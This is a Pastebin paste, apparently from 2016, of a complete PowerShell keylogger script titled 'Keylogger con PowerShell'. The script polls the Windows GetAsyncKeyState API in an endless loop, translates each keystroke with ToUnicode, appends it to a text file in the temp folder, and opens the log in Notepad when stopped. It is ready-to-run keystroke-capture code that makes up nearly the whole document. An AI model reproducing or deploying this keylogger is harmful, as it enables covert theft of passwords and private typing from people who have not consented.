API tools faq
paste
Advertisement
Alexislls

Keylogger con PowerShell

Alexislls
Dec 21st, 2016
10,893
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PowerShell 2.39 KB | None | 0 0
raw download clone embed print report
  1. #requires -Version 2
  2. function Start-KeyLogger($Path="$env:temp\keylogger.txt")
  3. {
  4.   # Signatures for API Calls
  5.   $signatures = @'
  6. [DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)]
  7. public static extern short GetAsyncKeyState(int virtualKeyCode);
  8. [DllImport("user32.dll", CharSet=CharSet.Auto)]
  9. public static extern int GetKeyboardState(byte[] keystate);
  10. [DllImport("user32.dll", CharSet=CharSet.Auto)]
  11. public static extern int MapVirtualKey(uint uCode, int uMapType);
  12. [DllImport("user32.dll", CharSet=CharSet.Auto)]
  13. public static extern int ToUnicode(uint wVirtKey, uint wScanCode, byte[] lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags);
  14. '@
  15.  
  16.   # load signatures and make members available
  17.   $API = Add-Type -MemberDefinition $signatures -Name 'Win32' -Namespace API -PassThru
  18.    
  19.   # create output file
  20.   $null = New-Item -Path $Path -ItemType File -Force
  21.  
  22.   try
  23.   {
  24.     Write-Host 'Recording key presses. Press CTRL+C to see results.' -ForegroundColor Red
  25.  
  26.     # create endless loop. When user presses CTRL+C, finally-block
  27.     # executes and shows the collected key presses
  28.     while ($true) {
  29.       Start-Sleep -Milliseconds 40
  30.      
  31.       # scan all ASCII codes above 8
  32.       for ($ascii = 9; $ascii -le 254; $ascii++) {
  33.         # get current key state
  34.         $state = $API::GetAsyncKeyState($ascii)
  35.  
  36.         # is key pressed?
  37.         if ($state -eq -32767) {
  38.           $null = [console]::CapsLock
  39.  
  40.           # translate scan code to real code
  41.           $virtualKey = $API::MapVirtualKey($ascii, 3)
  42.  
  43.           # get keyboard state for virtual keys
  44.           $kbstate = New-Object Byte[] 256
  45.           $checkkbstate = $API::GetKeyboardState($kbstate)
  46.  
  47.           # prepare a StringBuilder to receive input key
  48.           $mychar = New-Object -TypeName System.Text.StringBuilder
  49.  
  50.           # translate virtual key
  51.           $success = $API::ToUnicode($ascii, $virtualKey, $kbstate, $mychar, $mychar.Capacity, 0)
  52.  
  53.           if ($success)
  54.           {
  55.             # add key to logger file
  56.             [System.IO.File]::AppendAllText($Path, $mychar, [System.Text.Encoding]::Unicode)
  57.           }
  58.         }
  59.       }
  60.     }
  61.   }
  62.   finally
  63.   {
  64.     # open logger file in Notepad
  65.     notepad $Path
  66.   }
  67. }
  68.  
  69. # records all key presses until script is aborted by pressing CTRL+C
  70. # will then open the file with collected key codes
  71. Start-KeyLogger
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!